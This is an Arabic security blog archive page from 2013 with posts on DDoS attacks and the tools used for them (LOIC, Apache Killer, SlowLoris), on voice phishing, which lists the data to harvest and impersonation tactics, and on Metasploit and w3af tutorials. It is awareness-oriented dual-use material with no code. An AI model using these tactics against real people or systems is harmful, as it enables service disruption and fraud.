  • URL inclusion filter based on regular expressions.
  • Can optionally follow subdomains.
  • Adjustable link count limit.
  • Adjustable redirect limit.
  • Adjustable depth limit.
  • Modular path extraction via “Path Extractor” components.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope of the crawl).
التقارير النهائية :
Report components allow you to format scan results any way you wish. If the existing reports (HTML, Plain Text, XML, etc.) don’t fulfill your needs it is very easy to create one that suits you.
  • Modular design.
  • New report types can be added as needed.
والكثير من الخصائص تجدونها مع هذه المنصة الرائعة بصراحة شخصيا أعجبت بها وقمت بتجربتها على حاسوبي وسيكون لنا شرح لها إن شاء الله لكيفية إستخدامها أنصح محبي إختبار إختراق تطبيقات الويب بتجربتها لما بها من نتائج جد مبهرة.

الثلاثاء، 12 مارس 2013

فيديو : تعريف وتنصيب مشروع الميتاسبلويت الدرس الاول

هذا الدرس هو الدرس الأول لسلسلة سوف نشرح فيها مشروع الميتاسبلويت ونتحدث عنها من الصفر إلى الإحتراف إن شاء الله .. أغلب الشروحات سوف تكون تتحدث عن فهم أكثر للمشروع وكيفية عمله ومن ثم تطبيق على ما أخذنه ولكن لكي تصل المعلومه بشكل صحيح لمختبري الإختراق لا بد من إنشاء مختبر خاص بك على جهازك المحلي للتدرب عليه لأننا سوف نحتاج إلى بيئه عمال خاصه إن شاء الله في الدروس القادمه .. سوف يتم عرض درسين أسبوعين من السلسلة التي تحتوي تقريباً على 20 حلقه مصورة (فيديو) طبعاً الفيديو بصيغة ogg ويعمل من خلال المتصفحات الحديثه التي تدعم HTML5.

مقال: ماهي هجمات حجب الخدمة “DDOS ATTACK” و كيف يتم تنفيذها

من المؤكد ان جميعنا قد سمع بهجمات حجب الخدمة، او ما يعرف ب “DDOS ATTACK” و خاصة ونحن نعيش عدة ثورات عربية لم تخلو من قيام العديد من القراصنة او المجموعات بهجمات استهدفت مواقع حكومية. و من اشهر هذه الهجمات، هجمات حجب الخدمة التي تنفذتها مجموعة “Anonymous” ضد مواقع الحكومة التونسية احتجاجا على العنف المستخدم في مواجهة المتظاهرين.
فماهي هجمات  حجب الخدمة؟ و كيف يتم تنفيذها؟
ما معنى”DDOS” ؟
DDOS وهي اختصار ل “Distributed Denial-of-Service Attack”, وتعني ان مجموعة من اجهزة الكمبيوتر تقوم بمهاجمة سيرفر واحد (خادم واحد) بهدف حجب الخدمة عليه.
DDOS
الكثير من المواقع تحجب عن العمل بسبب هذه الهجمة “Distributed Denial-of-Service Attack”, هذه الهجمة هي من نوع “DoS attack” و تأتي من اكثر من حاسوب او مصدر في نفس الوقت. لكن ما معنى “DoS attack” ؟
هي نوع من الهجمات التي تحاول ان تجعل موارد السيرفر او الخادم غير متاحة للمستخدم. هذا يعني انه عندما يحصل “DoS attack” يتم استهلاك “Traffic” الموقع مما يؤدي الى انقطاع الموقع عن العمل و الظهور للزوار.
و في هذا المقال سيتم استعراض بعض الادوات الي يستخدمها المخترقون لتنفيذ هجماتهم.. (الشرح للغرض العلمي فقط، و انا بريئ ممن يستخدم هذه الادوات في اعمال تخريبية).

LOIC

LOIC هي اختصار ل “Low Orbit Ion Cannon” تم برمجتها بواسطة 4 من الهاكرز. تعتبر من فئة ال “Web Stress Tool” و تم استخدامها اساسا من طرف المخربين او المعروفين بإسم “Script Kiddies”. الشيء الاروع في هذه الاداة هو انه لا يمكن ايقافها اذا ما تم استعمالها ضد موقع واحد من قبل عدد من المهاجمين. هي اداة مفتوحة المصدر، و تعمل على ويندوز.
loic1

Apache Killer

Apache Killer ويعتبر An Internet Threat . هذا السكريبت يقوم بعمل عدد من الطلبات او الهجمات التي تستخدم عديد كبير من ال “ranges of headers” لاستنفاذ الذاكرة. بسبب هذا النوع من الادوات تم تسجيل ارتفاع في هجمات حجب الخدمة او “DoS attacks” التي تطورت في السنوات الاخيرة بصفة ملحوظة! لكن تم صدور اصلاح او ترقيع سريع فور الاعلان عن صدور هذه الاداة.
apache-killer

R-U-Dead-Yet

عندما يقوم Apache Killer بمهاجمة خادمات الويب، يقوم برنامج R-U-Dead-Yet باستغلال ال “HTTP Post Request” لمهاجمة ال “IIS server”.
read-u-yet

SlowLoris

SlowLoris هي اداة مبرمجة من قبل Robert Hansen و تمثل مشكلة كبيرة ل Apache2.
slowloris
سيتم التحدث اكثر عن هجمات حجب الخدمة و كيفية الحماية منها في سلسلة قادمة من التدوينات ان شاء الله. أتمنى عدم نقل الموضوع دون ذكر المدونة واستخدام موفق للجميع.

الجمعة، 8 مارس 2013

مقال : الأنظمة التليفونية Vishing

Vishing
طرق الإصطياد او مايسمى Phishing متعددة ويوجد العديد من الطرق التي يتم من خلالها إصطياد الهدف وإختراقة ,, فنجد الإصطياد إما عن طريق الإصطياد الإلكتروني مايسمى بال Phishing   او عبر الأنظمة التليفونية Vishing وأيضا عن طريق رسائل الجوال SMishing .
وكل من هذه الطرق يعتبر أكبر خطر وتهديد للمستخدم حيث أنه يتم إستهدافه مباشرة لنقم بشرح ماذا يعني الإصطياد عبر Vishing
لو نقم بتحليل كلمة Vishing   لوجدنا بأنها تحتوي على كلمتين وهما voice & Phishing
حيث يعتبر الصوت هو الادات المستعملة في الإختراق كاستخدام برنامج الاتصال والتواصل كبرنامج السكايب والياهو الخ..
 كيف ذلك يتم ذلك :
يعتبر كيفن ميتنك من أشهر الأشخاص من قامو بإستخدام الهندسة الإجتماعية بكل طرقها بالوصول لأهدافه حيث كان يستعمل الهاتف  لإقناع هدفه للوصول إلى معلومات يريدها .
كل هاته العوامل جعلت من الإصطياد عبر الأنظمة التليفونية أكثر خطورة ونجد أيضا تعدد مراكز الإتصال التي تستقبل مكالمات من الغرباء  وقد أحيانا يقمون بتوجيهك لهدفك مباشرة وأيضا بتسجيل المكالمات الصوتية مهما كانت مدتها كبيرة أو صغيرة.
المعلومات التي تريد جمعها ؟
ترتيب المعلومات وجمعها أمر مهم بحيث تسهل عليك عملية الإختراق ومن بين هته المعلومات المهمة التي تفيدك في عملية إختبار الإختراق :
  1. بيانات بطاقة الإتمان
  2. معلومات وكلمات المرور المستخدمة
  3. رقم الهوية
  4. معلومات السكن العمل
  5. وتساعده هاته المعلومات المخترق
  6. التحكم في حسابات الهدف البنكية
  7. وكذلك الشراء ببطاقة الإنتماء
  8. ونقل المصاريف لحساب ثاني
الإصطياد التليفوني يخول للمخترق طرق وأبواب عديدة حيث أن أغلب المحتالين والمخترقين يمشون بهذه الطريق بعمليات الإحتيال
 ويأتي كثرة إستخدامها نتيجة الأسباب التالية :
  1.   تسهل عليك طريقة الوصول لهدفك وجمع معلومات هامة تفيدك سواء كان المستهدف ببلد غير
  2.   إخفاء معلومات المتصل وعدم المقدرة على تتبعه في بعض الأحيان
  3.   صعوبة التعرف على ملامح المتصل سواء كان يكذب او يتحدث بصدق وهذا الشي مهم بشدة
  4.   إختفاء المتصل بحيث يستطيع تغيير مكانه بإستخدام بروكسي ويستطيع أمر إكتشافه امر صعب
تحدثنا الأن عن الإصطياد التليفوني ونتائجه العديدة  دعونا الأن لنتطرق إلى الطرق المستخدمة بالإحتيال
هنالك عدة طرق كما قلنا سابقا مثلا :
  1. إستخدام رسائل البريد الإلكتروني
  2. الرسائل النصية
  3. الرسائل الصوتية
  4. إتصال هاتفي
شخصيا أجد إستخدام رسائل البريد الإلكتروني أكثر إستخداما ونتائجها تكون مضمونة نوعا ما بحيث أنك تقوم بالتواصل مع الضحية ببعث له دعوة لموقع ما أو لحدث مما وتطلب منه بعث معلوماته لحجز مكانه أو تقوم بإحتيال شخصية موظف بجهة إدارية مسؤولة مثلا موظف بالبنك الذي تستخدمه وتطلب منه معلومات تدريجيا بغض النظر عن خطورة الإصطياد التيلفوني إلى أنك تستطيع حماية نفسك منه.
 كيف يتم ذلك : 
الحل بسيط بعدم قبول أي رسائل من أشخاص مجهولين والتأكد من الروابط التي تصلك عبر البريد الإلكتروني أو الرسائل النصية بإمكانك عندما  تتوصل برسالة تقوم بالإتصال مثلا بالبنتك والتأكد من المعلومة التي وصلتك والطلب هل هو إحتيال أم هو حقيقي لا تقم بإعطاء معلومات السرية والمهمة لأي شخص مهما كان لضمان حمايتك من الإحتيال.

تلخيص:
ملخص ماقلناه كله يتجلى فقط توعية الناس يبقى شيء ضروري ومهم من خلال القيام بدورات تدريبية حول الإصطياد الإلكتروني أو   الهندسة الإجتماعية بصفة عامة

الخميس، 7 مارس 2013

بودكاست : الحلقة الثالثة أنظمه التحكم SCADA والمخاطر الأمنية التي تهددها

تقييم القراء للمقال:
(3 تقييمات، بمعدل: 4.67 من إجمالي 5)
في هذه الحلقة إستضفنا الباحث الامني مهند الشحات مؤسس موقع مجتمع القبعات البيضاء ومهتم بامن أنظمه التحكم SCADA وتحدثنا عن هذه الأنظمه وتعرفنا عليها اكثر ومن ثم ذكرنا بعض النقاط المهمه في مثل هذه الأنظمه.

فيديو : شرح برنامج W3af لفحص ثغرات المواقع

شرح يتحدث عن برنامج w3af لفحص ثغرات المواقع وأستخراج أخطائها ومجلداتها.
برنامج w3af مبرمج بلغه البايثون وله عده إصدارات وعلى أكثر من نظام تشغيل مثل windows/liunx ولكن يحتاج لوجود مفسر بايثون موجود على نظام الوندوز لتتمكن من استخدامه.


طبعاً في الشرح أستخدمت البرنامج في فحص موقع مخصص لأختبار الأختراق و اكتشفنا ثغره sqli وحاولنا أستغلالها.

طبعاً بإمكانك عمل هجمات تخمين (brute force) على لوحات التحكم وبكل فاعليه أنا لم أشرح هذه الخاصيه ولكن إن شاء الله أستخدمها بدروس أخره.

اترككم مع الفيديو:-

الفيديو:

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

تعريب وتطوير: www.tempblogge.blogspot.com
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Facebook Themes custom blogger templates